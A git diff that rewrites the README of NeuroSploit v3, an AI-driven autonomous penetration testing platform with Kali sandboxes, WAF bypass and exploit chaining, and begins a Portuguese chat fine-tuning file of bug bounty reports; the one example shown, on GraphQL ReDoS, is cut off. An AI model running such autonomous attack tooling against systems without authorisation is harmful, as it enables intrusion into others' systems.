diff --git a/README.md b/README.md index d6df3ed..7954e03 100644 --- a/README.md +++ b/README.md @@ -5,34 +5,40 @@ ![License](https://img.shields.io/badge/License-MIT-green) ![Python](https://img.shields.io/badge/Python-3.10+-yellow) ![React](https://img.shields.io/badge/React-18-61dafb) +![Vuln Types](https://img.shields.io/badge/Vuln%20Types-100-red) +![Docker](https://img.shields.io/badge/Docker-Kali%20Sandbox-informational) -**AI-Powered Penetration Testing Platform with Web GUI** +**AI-Powered Autonomous Penetration Testing Platform** -NeuroSploit v3 is an advanced security assessment platform that combines AI-driven vulnerability testing with a modern web interface. It uses prompt-driven testing to dynamically determine what vulnerabilities to test based on natural language instructions. +NeuroSploit v3 is an advanced security assessment platform that combines AI-driven autonomous agents with 100 vulnerability types, per-scan isolated Kali Linux containers, false-positive hardening, exploit chaining, and a modern React web interface with real-time monitoring. --- -## What's New in v3 +## Highlights -- **Web GUI** - Modern React interface for scan management, real-time monitoring, and reports -- **Dynamic Vulnerability Engine** - Tests 50+ vulnerability types based on prompt analysis -- **Prompt-Driven Testing** - AI extracts vulnerability types from natural language prompts -- **Real-time Dashboard** - WebSocket-powered live updates during scans -- **Multiple Input Modes** - Single URL, comma-separated URLs, or file upload -- **Preset Prompts** - Ready-to-use security testing profiles -- **Export Reports** - HTML, PDF, and JSON export formats -- **Docker Deployment** - One-command deployment with Docker Compose +- **100 Vulnerability Types** across 10 categories with AI-driven testing prompts +- **Autonomous Agent** - 3-stream parallel pentest (recon + junior tester + tool runner) +- **Per-Scan Kali Containers** - Each scan runs in its own isolated Docker container +- **Anti-Hallucination Pipeline** - Negative controls, proof-of-execution, confidence scoring +- **Exploit Chain Engine** - Automatically chains findings (SSRF->internal, SQLi->DB-specific, etc.) +- **WAF Detection & Bypass** - 16 WAF signatures, 12 bypass techniques +- **Smart Strategy Adaptation** - Dead endpoint detection, diminishing returns, priority recomputation +- **Multi-Provider LLM** - Claude, GPT, Gemini, Ollama, LMStudio, OpenRouter +- **Real-Time Dashboard** - WebSocket-powered live scan progress, findings, and reports +- **Sandbox Dashboard** - Monitor running Kali containers, tools, health checks in real-time --- ## Table of Contents - [Quick Start](#quick-start) -- [Features](#features) - [Architecture](#architecture) +- [Autonomous Agent](#autonomous-agent) +- [100 Vulnerability Types](#100-vulnerability-types) +- [Kali Sandbox System](#kali-sandbox-system) +- [Anti-Hallucination & Validation](#anti-hallucination--validation) - [Web GUI](#web-gui) - [API Reference](#api-reference) -- [Vulnerability Engine](#vulnerability-engine) - [Configuration](#configuration) - [Development](#development) - [Security Notice](#security-notice) @@ -45,30 +51,26 @@ NeuroSploit v3 is an advanced security assessment platform that combines AI-driv ```bash # Clone repository -git clone https://github.com/CyberSecurityUP/NeuroSploit.git -cd NeuroSploit +git clone https://github.com/your-org/NeuroSploitv2.git +cd NeuroSploitv2 # Copy environment file and add your API keys cp .env.example .env -nano .env # Add ANTHROPIC_API_KEY or OPENAI_API_KEY +nano .env # Add ANTHROPIC_API_KEY, OPENAI_API_KEY, or GEMINI_API_KEY -# Start with Docker Compose -./start.sh -# or -docker-compose up -d +# Build the Kali sandbox image (first time only, ~5 min) +./scripts/build-kali.sh + +# Start backend +uvicorn backend.main:app --host 0.0.0.0 --port 8000 ``` -Access the web interface at **http://localhost:3000** - ### Option 2: Manual Setup ```bash # Backend -cd backend -python3 -m venv venv -source venv/bin/activate pip install -r requirements.txt -uvicorn backend.main:app --host 0.0.0.0 --port 8000 +uvicorn backend.main:app --host 0.0.0.0 --port 8000 --reload # Frontend (new terminal) cd frontend @@ -76,37 +78,23 @@ npm install npm run dev ``` ---- +### Build Kali Sandbox Image -## Features +```bash +# Normal build (uses Docker cache) +./scripts/build-kali.sh -### Core Capabilities +# Full rebuild (no cache) +./scripts/build-kali.sh --fresh -| Feature | Description | -|---------|-------------| -| **Dynamic Testing** | 50+ vulnerability types across 10 categories | -| **Prompt-Driven** | AI extracts test types from natural language | -| **Web Interface** | Modern React dashboard with real-time updates | -| **Multiple Inputs** | Single URL, bulk URLs, or file upload | -| **Preset Prompts** | Bug Bounty, OWASP Top 10, API Security, and more | -| **Export Reports** | HTML, PDF, JSON with professional styling | -| **WebSocket Updates** | Real-time scan progress and findings | -| **Docker Ready** | One-command deployment | +# Build + run health check +./scripts/build-kali.sh --test -### Vulnerability Categories +# Or via docker-compose +docker compose -f docker/docker-compose.kali.yml build +``` -| Category | Vulnerability Types | -|----------|---------------------| -| **Injection** | XSS (Reflected/Stored/DOM), SQLi, NoSQLi, Command Injection, SSTI, LDAP, XPath | -| **File Access** | LFI, RFI, Path Traversal, File Upload, XXE | -| **Request Forgery** | SSRF, CSRF, Cloud Metadata Access | -| **Authentication** | Auth Bypass, JWT Manipulation, Session Fixation, OAuth Flaws | -| **Authorization** | IDOR, BOLA, BFLA, Privilege Escalation | -| **API Security** | Rate Limiting, Mass Assignment, GraphQL Injection | -| **Logic Flaws** | Race Conditions, Business Logic, Workflow Bypass | -| **Client-Side** | CORS Misconfiguration, Clickjacking, Open Redirect, WebSocket | -| **Info Disclosure** | Error Disclosure, Source Code Exposure, Debug Endpoints | -| **Infrastructure** | Security Headers, SSL/TLS Issues, HTTP Methods | +Access the web interface at **http://localhost:8000** (production build) or **http://localhost:5173** (dev mode). --- @@ -114,94 +102,311 @@ npm run dev ``` NeuroSploitv3/ -├── backend/ # FastAPI Backend -│ ├── api/v1/ # REST API endpoints -│ │ ├── scans.py # Scan CRUD operations -│ │ ├── targets.py # Target validation -│ │ ├── prompts.py # Preset prompts -│ │ ├── reports.py # Report generation -│ │ ├── dashboard.py # Dashboard stats -│ │ └── vulnerabilities.py # Vulnerability management +├── backend/ # FastAPI Backend +│ ├── api/v1/ # REST API (13 routers) +│ │ ├── scans.py # Scan CRUD + pause/resume/stop +│ │ ├── agent.py # AI Agent control +│ │ ├── agent_tasks.py # Scan task tracking +│ │ ├── dashboard.py # Stats + activity feed +│ │ ├── reports.py # Report generation (HTML/PDF/JSON) +│ │ ├── scheduler.py # Cron/interval scheduling +│ │ ├── vuln_lab.py # Per-type vulnerability lab +│ │ ├── terminal.py # Terminal agent (10 endpoints) +│ │ ├── sandbox.py # Sandbox container monitoring +│ │ ├── targets.py # Target validation +│ │ ├── prompts.py # Preset prompts +│ │ ├── vulnerabilities.py # Vulnerability management +│ │ └── settings.py # Runtime settings │ ├── core/ -│ │ ├── vuln_engine/ # Dynamic vulnerability testing -│ │ │ ├── engine.py # Main testing engine -│ │ │ ├── registry.py # Vulnerability registry -│ │ │ ├── payload_generator.py -│ │ │ └── testers/ # Category-specific testers -│ │ ├── prompt_engine/ # Prompt parsing -│ │ │ └── parser.py # Extract vuln types from prompts -│ │ └── report_engine/ # Report generation -│ │ └── generator.py # HTML/PDF/JSON export -│ ├── models/ # SQLAlchemy ORM models -│ ├── schemas/ # Pydantic validation schemas -│ ├── services/ # Business logic -│ └── main.py # FastAPI app entry +│ │ ├── autonomous_agent.py # Main AI agent (~7000 lines) +│ │ ├── vuln_engine/ # 100-type vulnerability engine +│ │ │ ├── registry.py # 100 VULNERABILITY_INFO entries +│ │ │ ├── payload_generator.py # 526 payloads across 95 libraries +│ │ │ ├── ai_prompts.py # Per-vuln AI decision prompts +│ │ │ ├── system_prompts.py # 12 anti-hallucination prompts +│ │ │ └── testers/ # 10 category tester modules +│ │ ├── validation/ # False-positive hardening +│ │ │ ├── negative_control.py # Benign request control engine +│ │ │ ├── proof_of_execution.py # Per-type proof checks (25+ methods) +│ │ │ ├── confidence_scorer.py # Numeric 0-100 scoring +│ │ │ └── validation_judge.py # Sole authority for finding approval +│ │ ├── request_engine.py # Retry, rate limit, circuit breaker +│ │ ├── waf_detector.py # 16 WAF signatures + bypass +│ │ ├── strategy_adapter.py # Mid-scan strategy adaptation +│ │ ├── chain_engine.py # 10 exploit chain rules +│ │ ├── auth_manager.py # Multi-user auth management +│ │ ├── xss_context_analyzer.py # 8-context XSS analysis +│ │ ├── poc_generator.py # 20+ per-type PoC generators +│ │ ├── execution_history.py # Cross-scan learning +│ │ ├── access_control_learner.py # Adaptive BOLA/BFLA/IDOR learning +│ │ ├── response_verifier.py # 4-signal response verification +│ │ ├── agent_memory.py # Bounded dedup agent memory +│ │ └── report_engine/ # OHVR report generator +│ ├── models/ # SQLAlchemy ORM models +│ ├── db/ # Database layer +│ ├── config.py # Pydantic settings +│ └── main.py # FastAPI app entry │ -├── frontend/ # React Frontend +├── core/ # Shared core modules +│ ├── llm_manager.py # Multi-provider LLM routing +│ ├── sandbox_manager.py # BaseSandbox ABC + legacy shared sandbox +│ ├── kali_sandbox.py # Per-scan Kali container manager +│ ├── container_pool.py # Global container pool coordinator +│ ├── tool_registry.py # 56 tool install recipes for Kali +│ ├── mcp_server.py # MCP server (12 tools, stdio) +│ ├── scheduler.py # APScheduler scan scheduling +│ └── browser_validator.py # Playwright browser validation +│ +├── frontend/ # React + TypeScript Frontend │ ├── src/ -│ │ ├── pages/ # Page components -│ │ │ ├── HomePage.tsx # Dashboard -│ │ │ ├── NewScanPage.tsx # Create scan -│ │ │ ├── ScanDetailsPage.tsx -│ │ │ ├── ReportsPage.tsx -│ │ │ └── ReportViewPage.tsx -│ │ ├── components/ # Reusable components -│ │ ├── services/ # API client -│ │ └── store/ # Zustand state +│ │ ├── pages/ +│ │ │ ├── HomePage.tsx # Dashboard with stats +│ │ │ ├── AutoPentestPage.tsx # 3-stream auto pentest +│ │ │ ├── VulnLabPage.tsx # Per-type vulnerability lab +│ │ │ ├── TerminalAgentPage.tsx # AI terminal chat +│ │ │ ├── SandboxDashboardPage.tsx # Container monitoring +│ │ │ ├── ScanDetailsPage.tsx # Findings + validation +│ │ │ ├── SchedulerPage.tsx # Cron/interval scheduling +│ │ │ ├── SettingsPage.tsx # Configuration +│ │ │ └── ReportsPage.tsx # Report management +│ │ ├── components/ # Reusable UI components +│ │ ├── services/api.ts # API client layer +│ │ └── types/index.ts # TypeScript interfaces │ └── package.json │ -├── docker/ # Docker configuration -│ ├── Dockerfile.backend -│ ├── Dockerfile.frontend -│ └── nginx.conf +├── docker/ +│ ├── Dockerfile.kali # Multi-stage Kali sandbox (11 Go tools) +│ ├── Dockerfile.sandbox # Legacy Debian sandbox +│ ├── Dockerfile.backend # Backend container +│ ├── Dockerfile.frontend # Frontend container +│ ├── docker-compose.kali.yml # Kali sandbox build +│ └── docker-compose.sandbox.yml # Legacy sandbox │ -├── docker-compose.yml -├── start.sh -└── .env.example +├── config/config.json # Profiles, tools, sandbox, MCP +├── data/ +│ ├── vuln_knowledge_base.json # 100 vuln type definitions +│ ├── execution_history.json # Cross-scan learning data +│ └── access_control_learning.json # BOLA/BFLA adaptive data +│ +├── scripts/ +│ └── build-kali.sh # Build/rebuild Kali image +├── tools/ +│ └── benchmark_runner.py # 104 CTF challenges +├── agents/base_agent.py # BaseAgent class +├── neurosploit.py # CLI entry point +└── requirements.txt ``` --- +## Autonomous Agent + +The AI agent (`autonomous_agent.py`) orchestrates the entire penetration test autonomously. + +### 3-Stream Parallel Architecture + +``` + ┌─────────────────────┐ + │ Auto Pentest │ + │ Target URL(s) │ + └────────┬────────────┘ + │ + ┌──────────────┼──────────────┐ + ▼ ▼ ▼ + ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ + │ Stream 1 │ │ Stream 2 │ │ Stream 3 │ + │ Recon │ │ Junior Test │ │ Tool Runner │ + │ ─────────── │ │ ─────────── │ │ ─────────── │ + │ Crawl pages │ │ Test target │ │ Nuclei scan │ + │ Find params │ │ AI-priority │ │ Naabu ports │ + │ Tech detect │ │ 3 payloads │ │ AI decides │ + │ WAF detect │ │ per endpoint│ │ extra tools │ + └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ + │ │ │ + └────────────────┼────────────────┘ + ▼ + ┌─────────────────────┐ + │ Deep Analysis │ + │ 100 vuln types │ + │ Full payload sets │ + │ Chain exploitation │ + └─────────┬───────────┘ + ▼ + ┌─────────────────────┐ + │ Report Generation │ + │ AI executive brief │ + │ PoC code per find │ + └─────────────────────┘ +``` + +### Agent Autonomy Modules + +| Module | Description | +|--------|-------------| +| **Request Engine** | Retry with backoff, per-host rate limiting, circuit breaker, adaptive timeouts | +| **WAF Detector** | 16 WAF signatures (Cloudflare, AWS, Akamai, Imperva, etc.), 12 bypass techniques | +| **Strategy Adapter** | Dead endpoint detection, diminishing returns, 403 bypass, priority recomputation | +| **Chain Engine** | 10 chain rules (SSRF->internal, SQLi->DB-specific, LFI->config, IDOR pattern transfer) | +| **Auth Manager** | Multi-user contexts (user_a, user_b, admin), login form detection, session management | + +### Scan Features + +- **Pause / Resume / Stop** with checkpoints +- **Manual Validation** - Confirm or reject AI findings +- **Screenshot Capture** on confirmed findings (Playwright) +- **Cross-Scan Learning** - Historical success rates influence future priorities +- **CVE Testing** - Regex detection + AI-generated payloads + +--- + +## 100 Vulnerability Types + +### Categories + +| Category | Types | Examples | +|----------|-------|---------| +| **Injection** | 38 | XSS (reflected/stored/DOM), SQLi, NoSQLi, Command Injection, SSTI, LDAP, XPath, CRLF, Header Injection, Log Injection, GraphQL Injection | +| **Inspection** | 21 | Security Headers, CORS, Clickjacking, Info Disclosure, Debug Endpoints, Error Disclosure, Source Code Exposure | +| **AI-Driven** | 41 | BOLA, BFLA, IDOR, Race Condition, Business Logic, JWT Manipulation, OAuth Flaws, Prototype Pollution, WebSocket Hijacking, Cache Poisoning, HTTP Request Smuggling | +| **Authentication** | 8 | Auth Bypass, Session Fixation, Credential Stuffing, Password Reset Flaws, MFA Bypass, Default Credentials | +| **Authorization** | 6 | BOLA, BFLA, IDOR, Privilege Escalation, Forced Browsing, Function-Level Access Control | +| **File Access** | 5 | LFI, RFI, Path Traversal, File Upload, XXE | +| **Request Forgery** | 4 | SSRF, CSRF, Cloud Metadata, DNS Rebinding | +| **Client-Side** | 8 | CORS, Clickjacking, Open Redirect, DOM Clobbering, Prototype Pollution, PostMessage, CSS Injection | +| **Infrastructure** | 6 | SSL/TLS, HTTP Methods, Subdomain Takeover, Host Header, CNAME Hijacking | +| **Cloud/Supply** | 4 | Cloud Metadata, S3 Bucket Misconfiguration, Dependency Confusion, Third-Party Script | + +### Payload Engine + +- **526 payloads** across 95 libraries +- **73 XSS stored payloads** + 5 context-specific sets +- Per-type AI decision prompts with anti-hallucination directives +- WAF-adaptive payload transformation (12 techniques) + +--- + +## Kali Sandbox System + +Each scan runs in its own **isolated Kali Linux Docker container**, providing: + +- **Complete Isolation** - No interference between concurrent scans +- **On-Demand Tools** - 56 tools installed only when needed +- **Auto Cleanup** - Containers destroyed when scan completes +- **Resource Limits** - Per-container memory (2GB) and CPU (2 cores) limits + +### Pre-Installed Tools (28) + +| Category | Tools | +|----------|-------| +| **Scanners** | nuclei, naabu, httpx, nmap, nikto, masscan, whatweb | +| **Discovery** | subfinder, katana, dnsx, uncover, ffuf, gobuster, waybackurls | +| **Exploitation** | dalfox, sqlmap | +| **System** | curl, wget, git, python3, pip3, go, jq, dig, whois, openssl, netcat, bash | + +### On-Demand Tools (28 more) + +Installed automatically inside the container when first requested: + +- **APT**: wpscan, dirb, hydra, john, hashcat, testssl, sslscan, enum4linux, dnsrecon, amass, medusa, crackmapexec, etc. +- **Go**: gau, gitleaks, anew, httprobe +- **Pip**: dirsearch, wfuzz, arjun, wafw00f, sslyze, commix, trufflehog, retire + +### Container Pool + +``` +ContainerPool (global coordinator, max 5 concurrent) + ├── KaliSandbox(scan_id="abc") → docker: neurosploit-abc + ├── KaliSandbox(scan_id="def") → docker: neurosploit-def + └── KaliSandbox(scan_id="ghi") → docker: neurosploit-ghi +``` + +- **TTL enforcement** - Containers auto-destroyed after 60 min +- **Orphan cleanup** - Stale containers removed on server startup +- **Graceful fallback** - Falls back to shared container if Docker unavailable + +--- + +## Anti-Hallucination & Validation + +NeuroSploit uses a multi-layered validation pipeline to eliminate false positives: + +### Validation Pipeline + +``` +Finding Candidate + │ + ▼ +┌─────────────────────┐ +│ Negative Controls │ Send benign/empty requests as controls +│ Same behavior = FP │ -60 confidence if same response +└─────────┬───────────┘ + ▼ +┌─────────────────────┐ +│ Proof of Execution │ 25+ per-vuln-type proof methods +│ XSS: context check │ SSRF: metadata markers +│ SQLi: DB errors │ BOLA: data comparison +└─────────┬───────────┘ + ▼ +┌─────────────────────┐ +│ AI Interpretation │ LLM with anti-hallucination prompts +│ Per-type system msgs │ 12 composable prompt templates +└─────────┬───────────┘ + ▼ +┌─────────────────────┐ +│ Confidence Scorer │ 0-100 numeric score +│ ≥90 = confirmed │ +proof, +impact, +controls +│ ≥60 = likely │ -baseline_only, -same_behavior +│ <60 = rejected │ Breakdown visible in UI +└─────────┬───────────┘ + ▼ +┌─────────────────────┐ +│ Validation Judge │ Final verdict authority +│ approve / reject │ Records for adaptive learning +└─────────────────────┘ +``` + +### Anti-Hallucination System Prompts + +12 composable prompts applied across 7 task contexts: +- `anti_hallucination` - Core truthfulness directives +- `proof_of_execution` - Require concrete evidence +- `negative_controls` - Compare with benign requests +- `anti_severity_inflation` - Accurate severity ratings +- `access_control_intelligence` - BOLA/BFLA data comparison methodology + +### Access Control Adaptive Learning + +- Records TP/FP outcomes per domain for BOLA/BFLA/IDOR +- 9 default response patterns, 6 known FP patterns (WSO2, Keycloak, etc.) +- Historical FP rate influences future confidence scoring + +--- + ## Web GUI -### Dashboard (Home Page) +### Pages -- **Stats Overview** - Total scans, vulnerabilities by severity, success rate -- **Severity Distribution** - Visual chart of critical/high/medium/low findings -- **Recent Scans** - Quick access to latest scan results -- **Recent Findings** - Latest discovered vulnerabilities +| Page | Route | Description | +|------|-------|-------------| +| **Dashboard** | `/` | Stats overview, severity distribution, recent activity feed | +| **Auto Pentest** | `/auto` | One-click autonomous pentest with 3-stream live display | +| **Vuln Lab** | `/vuln-lab` | Per-type vulnerability testing (100 types, 11 categories) | +| **Terminal Agent** | `/terminal` | AI-powered interactive security chat + tool execution | +| **Sandboxes** | `/sandboxes` | Real-time Docker container monitoring + management | +| **AI Agent** | `/scan/new` | Manual scan creation with prompt selection | +| **Scan Details** | `/scan/:id` | Findings with confidence badges, pause/resume/stop | +| **Scheduler** | `/scheduler` | Cron/interval automated scan scheduling | +| **Reports** | `/reports` | HTML/PDF/JSON report generation and viewing | +| **Settings** | `/settings` | LLM providers, model routing, feature toggles | -### New Scan Page +### Sandbox Dashboard -**Target Input Modes:** -- **Single URL** - Enter one target URL -- **Multiple URLs** - Comma-separated list -- **File Upload** - Upload .txt file with URLs (one per line) - -**Prompt Options:** -- **Preset Prompts** - Select from ready-to-use profiles: - - Full Penetration Test - - OWASP Top 10 - - API Security Assessment - - Bug Bounty Hunter - - Quick Security Scan - - Authentication Testing -- **Custom Prompt** - Write your own testing instructions -- **No Prompt** - Run all available tests - -### Scan Details Page - -- **Progress Bar** - Real-time scan progress -- **Discovered Endpoints** - List of found paths and URLs -- **Vulnerabilities** - Real-time findings with severity badges -- **Activity Log** - Live scan events via WebSocket - -### Reports Page - -- **Report List** - All generated reports with metadata -- **View Report** - In-browser HTML viewer -- **Export Options** - Download as HTML, PDF, or JSON -- **Delete Reports** - Remove old reports +Real-time monitoring of per-scan Kali containers: +- **Pool stats** - Active/max containers, Docker status, TTL +- **Capacity bar** - Visual utilization indicator +- **Per-container cards** - Name, scan link, uptime, installed tools, status +- **Actions** - Health check, destroy (with confirmation), cleanup expired/orphans +- **5-second auto-polling** for real-time updates --- @@ -222,114 +427,77 @@ http://localhost:8000/api/v1 | `POST` | `/scans` | Create new scan | | `GET` | `/scans` | List all scans | | `GET` | `/scans/{id}` | Get scan details | -| `POST` | `/scans/{id}/start` | Start scan execution | -| `POST` | `/scans/{id}/stop` | Stop running scan | +| `POST` | `/scans/{id}/start` | Start scan | +| `POST` | `/scans/{id}/stop` | Stop scan | +| `POST` | `/scans/{id}/pause` | Pause scan | +| `POST` | `/scans/{id}/resume` | Resume scan | | `DELETE` | `/scans/{id}` | Delete scan | -| `GET` | `/scans/{id}/endpoints` | Get discovered endpoints | -| `GET` | `/scans/{id}/vulnerabilities` | Get found vulnerabilities | -#### Targets +#### AI Agent | Method | Endpoint | Description | |--------|----------|-------------| -| `POST` | `/targets/validate` | Validate URL(s) | -| `POST` | `/targets/upload` | Upload URL file | +| `POST` | `/agent/run` | Launch autonomous agent | +| `GET` | `/agent/status/{id}` | Get agent status + findings | +| `GET` | `/agent/by-scan/{scan_id}` | Get agent by scan ID | +| `POST` | `/agent/stop/{id}` | Stop agent | +| `POST` | `/agent/pause/{id}` | Pause agent | +| `POST` | `/agent/resume/{id}` | Resume agent | +| `GET` | `/agent/findings/{id}` | Get findings with details | +| `GET` | `/agent/logs/{id}` | Get agent logs | -#### Prompts +#### Sandbox | Method | Endpoint | Description | |--------|----------|-------------| -| `GET` | `/prompts/presets` | List preset prompts | -| `GET` | `/prompts/presets/{id}` | Get preset details | -| `POST` | `/prompts/parse` | Parse custom prompt | +| `GET` | `/sandbox` | List containers + pool status | +| `GET` | `/sandbox/{scan_id}` | Health check container | +| `DELETE` | `/sandbox/{scan_id}` | Destroy container | +| `POST` | `/sandbox/cleanup` | Remove expired containers | +| `POST` | `/sandbox/cleanup-orphans` | Remove orphan containers | -#### Reports +#### Scheduler | Method | Endpoint | Description | |--------|----------|-------------| -| `GET` | `/reports` | List all reports | -| `GET` | `/reports/{id}` | Get report details | -| `GET` | `/reports/{id}/download` | Download report | -| `DELETE` | `/reports/{id}` | Delete report | +| `GET` | `/scheduler` | List scheduled jobs | +| `POST` | `/scheduler` | Create scheduled job | +| `DELETE` | `/scheduler/{id}` | Delete job | +| `POST` | `/scheduler/{id}/pause` | Pause job | +| `POST` | `/scheduler/{id}/resume` | Resume job | -#### Dashboard +#### Vulnerability Lab | Method | Endpoint | Description | |--------|----------|-------------| -| `GET` | `/dashboard/stats` | Get dashboard statistics | -| `GET` | `/dashboard/recent-scans` | Get recent scans | -| `GET` | `/dashboard/recent-findings` | Get recent vulnerabilities | +| `GET` | `/vuln-lab/types` | List 100 vuln types by category | +| `POST` | `/vuln-lab/run` | Run per-type vulnerability test | +| `GET` | `/vuln-lab/challenges` | List challenge runs | +| `GET` | `/vuln-lab/stats` | Detection rate stats | + +#### Reports & Dashboard + +| Method | Endpoint | Description | +|--------|----------|-------------| +| `POST` | `/reports` | Generate report | +| `POST` | `/reports/ai-generate` | AI-powered report | +| `GET` | `/reports/{id}/view` | View HTML report | +| `GET` | `/dashboard/stats` | Dashboard statistics | +| `GET` | `/dashboard/activity-feed` | Recent activity | ### WebSocket ``` -ws://localhost:8000/ws/{scan_id} +ws://localhost:8000/ws/scan/{scan_id} ``` -**Events:** -- `scan_started` - Scan has begun -- `scan_progress` - Progress update (percentage) -- `endpoint_found` - New endpoint discovered -- `vulnerability_found` - New vulnerability found -- `scan_completed` - Scan finished -- `scan_error` - Error occurred +Events: `scan_started`, `progress_update`, `finding_discovered`, `scan_completed`, `scan_error` ---- +### API Docs -## Vulnerability Engine - -### How It Works - -1. **Prompt Parsing** - User prompt analyzed for vulnerability keywords -2. **Type Extraction** - Relevant vulnerability types identified -3. **Tester Selection** - Appropriate testers loaded from registry -4. **Payload Generation** - Context-aware payloads generated -5. **Testing Execution** - Tests run against target endpoints -6. **Finding Reporting** - Results sent via WebSocket in real-time - -### Prompt Examples - -``` -"Test for SQL injection and XSS vulnerabilities" -→ Extracts: sql_injection, xss_reflected, xss_stored - -"Check for OWASP Top 10 issues" -→ Extracts: All major vulnerability types - -"Look for authentication bypass and IDOR" -→ Extracts: auth_bypass, idor, bola - -"Find server-side request forgery and file inclusion" -→ Extracts: ssrf, lfi, rfi, path_traversal -``` - -### Adding Custom Testers - -Create a new tester in `backend/core/vuln_engine/testers/`: - -```python -from .base_tester import BaseTester, TestResult - -class MyCustomTester(BaseTester): - """Custom vulnerability tester""" - - async def test(self, url: str, endpoint: str, params: dict) -> list[TestResult]: - results = [] - # Your testing logic here - return results -``` - -Register in `backend/core/vuln_engine/registry.py`: - -```python -VULNERABILITY_REGISTRY["my_custom_vuln"] = { - "name": "My Custom Vulnerability", - "category": "custom", - "severity": "high", - "tester": "MyCustomTester", - # ... -} -``` +Interactive docs available at: +- Swagger UI: `http://localhost:8000/api/docs` +- ReDoc: `http://localhost:8000/api/redoc` --- @@ -338,91 +506,89 @@ VULNERABILITY_REGISTRY["my_custom_vuln"] = { ### Environment Variables ```bash -# .env file +# LLM API Keys (at least one required) +ANTHROPIC_API_KEY=your-key +OPENAI_API_KEY=your-key +GEMINI_API_KEY=your-key -# LLM API Keys (at least one required for AI-powered testing) -ANTHROPIC_API_KEY=your-anthropic-api-key -OPENAI_API_KEY=your-openai-api-key +# Local LLM (optional) +OLLAMA_BASE_URL=http://localhost:11434 +LMSTUDIO_BASE_URL=http://localhost:1234 +OPENROUTER_API_KEY=your-key -# Database (default is SQLite) +# Database DATABASE_URL=sqlite+aiosqlite:///./data/neurosploit.db -# Server Configuration +# Server HOST=0.0.0.0 PORT=8000 DEBUG=false ``` -### Preset Prompts +### config/config.json -Available presets in `/api/v1/prompts/presets`: - -| ID | Name | Description | -|----|------|-------------| -| `full_pentest` | Full Penetration Test | Comprehensive testing across all categories | -| `owasp_top10` | OWASP Top 10 | Focus on OWASP Top 10 vulnerabilities | -| `api_security` | API Security | API-specific security testing | -| `bug_bounty` | Bug Bounty Hunter | High-impact findings for bounty programs | -| `quick_scan` | Quick Security Scan | Fast essential security checks | -| `auth_testing` | Authentication Testing | Auth and session security | +```json +{ + "llm": { + "default_profile": "gemini_pro_default", + "profiles": { ... } + }, + "agent_roles": { + "pentest_generalist": { "vuln_coverage": 100 }, + "bug_bounty_hunter": { "vuln_coverage": 100 } + }, + "sandbox": { + "mode": "per_scan", + "kali": { + "enabled": true, + "image": "neurosploit-kali:latest", + "max_concurrent": 5, + "container_ttl_minutes": 60 + } + }, + "mcp_servers": { + "neurosploit_tools": { + "transport": "stdio", + "command": "python3", + "args": ["-m", "core.mcp_server"] + } + } +} +``` --- ## Development -### Backend Development +### Backend ```bash -cd backend -python3 -m venv venv -source venv/bin/activate pip install -r requirements.txt - -# Run with hot reload uvicorn backend.main:app --reload --host 0.0.0.0 --port 8000 -# API docs available at http://localhost:8000/docs +# API docs: http://localhost:8000/api/docs ``` -### Frontend Development +### Frontend ```bash cd frontend npm install -npm run dev - -# Build for production -npm run build +npm run dev # Dev server at http://localhost:5173 +npm run build # Production build ``` -### Running Tests +### Build Kali Sandbox ```bash -# Backend tests -cd backend -pytest - -# Frontend tests -cd frontend -npm test +./scripts/build-kali.sh --test # Build + health check ``` ---- +### MCP Server -## Upgrading from v2 - -v3 is a complete rewrite with a new architecture. Key differences: - -| Feature | v2 | v3 | -|---------|----|----| -| Interface | CLI only | Web GUI + API | -| Vulnerability Testing | Hardcoded (XSS, SQLi, LFI) | Dynamic 50+ types | -| Test Selection | Manual | Prompt-driven | -| Progress Updates | Terminal output | WebSocket real-time | -| Reports | HTML file | Web viewer + export | -| Deployment | Python script | Docker Compose | - -**Migration:** v3 is a separate installation. Your v2 configurations and results are not compatible. +```bash +python3 -m core.mcp_server # Starts stdio MCP server (12 tools) +``` --- @@ -430,7 +596,7 @@ v3 is a complete rewrite with a new architecture. Key differences: **This tool is for authorized security testing only.** -- Only test systems you own or have written permission to test +- Only test systems you own or have explicit written permission to test - Follow responsible disclosure practices - Comply with all applicable laws and regulations - Unauthorized access to computer systems is illegal @@ -443,25 +609,17 @@ MIT License - See [LICENSE](LICENSE) for details. --- -## Contributing +## Tech Stack -1. Fork the repository -2. Create a feature branch -3. Submit a pull request +| Layer | Technologies | +|-------|-------------| +| **Backend** | Python, FastAPI, SQLAlchemy, Pydantic, aiohttp | +| **Frontend** | React 18, TypeScript, TailwindCSS, Vite | +| **AI/LLM** | Anthropic Claude, OpenAI GPT, Google Gemini, Ollama, LMStudio, OpenRouter | +| **Sandbox** | Docker, Kali Linux, ProjectDiscovery suite, Nmap, SQLMap, Nikto | +| **Tools** | Nuclei, Naabu, httpx, Subfinder, Katana, FFuf, Gobuster, Dalfox | +| **Infra** | Docker Compose, MCP Protocol, Playwright, APScheduler | --- -## Acknowledgements - -### Technologies -- FastAPI, SQLAlchemy, Pydantic -- React, TypeScript, TailwindCSS, Zustand -- Docker, Nginx - -### LLM Providers -- Anthropic Claude -- OpenAI GPT - ---- - -**NeuroSploit v3** - *AI-Powered Penetration Testing Platform* +**NeuroSploit v3** - *AI-Powered Autonomous Penetration Testing Platform* diff --git a/logs/backend.log b/logs/backend.log new file mode 100644 index 0000000..d00491f --- /dev/null +++ b/logs/backend.log @@ -0,0 +1 @@ +1 diff --git a/logs/frontend.log b/logs/frontend.log new file mode 100644 index 0000000..0cfbf08 --- /dev/null +++ b/logs/frontend.log @@ -0,0 +1 @@ +2 diff --git a/models/bug-bounty/bugbounty_chat_finetuning.jsonl b/models/bug-bounty/bugbounty_chat_finetuning.jsonl new file mode 100644 index 0000000..ec1ab83 --- /dev/null +++ b/models/bug-bounty/bugbounty_chat_finetuning.jsonl @@ -0,0 +1,1826 @@ +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: ReDoS at wiki.cs.money graphQL endpoint (AND probably a kind of command injection)"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe endpoint /graphql has a vulnerable query operation named \"search\", that can I send a Regex malformed parameter, in order to trick the original regular expression to a regex bomb expression. \n\n+ Payload with a \"common\" search, querying the value \"AAA\":\n\n```\nquery a { \n search(q: 